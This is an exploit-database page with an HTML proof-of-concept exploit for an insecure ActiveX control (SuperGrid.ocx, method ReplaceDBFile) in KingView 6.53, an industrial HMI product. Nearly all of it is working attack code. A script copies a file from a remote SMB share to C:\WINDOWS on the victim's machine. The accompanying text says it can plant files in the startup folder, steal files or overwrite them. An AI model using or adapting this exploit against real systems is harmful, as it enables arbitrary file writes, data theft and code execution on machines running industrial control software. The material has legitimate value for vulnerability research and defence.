0day.today - Biggest Exploit Database in the World.
KingView 6.53 - Insecure ActiveX Control (SuperGrid)
<html>
<object classid='clsid:F494550F-A028-4817-A7B5-E5F2DCB4A47E' id='target'></object>
<!--
KingView Insecure ActiveX Control - SuperGrid
Vendor: http://www.wellintech.com
Version: KingView 6.53
Tested on: Windows XP SP3 / IE
Download: http://www.wellintech.com/documents/KingView6.53_EN.zip
Author: Blake

CLSID: F494550F-A028-4817-A7B5-E5F2DCB4A47E
ProgId: SUPERGRIDLib.SuperGrid
Path: C:\Program Files\KingView\SuperGrid.ocx
MemberName: ReplaceDBFile
Safe for scripting: False
Safe for init: False
Kill Bit: False
IObject safety not implemented
-->
<title>KingView Insecure ActiveX Control Proof of Concept - SuperGrid.ocx</title>
<p>This proof of concept will copy any arbitrary file from one location to a second location. A malicious user may be able to use this to copy a file from an attacker controlled share to the target or from the target to an attacker controlled system (i.e. from an attacker share to the startup folder). It can also be used to overwrite existing files.</p>
<input type=button onclick="copyfile()" value="Do It!">
<script>
function copyfile()
{
    var file1 = "\\\\192.168.1.165\\share\\poc.txt"; // source
    var file2 = "c:\\WINDOWS\\poc.txt";              // destination
    result = target.ReplaceDBFile(file1,file2);
}
</script>
</html>
# 0day.today [2024-09-28] #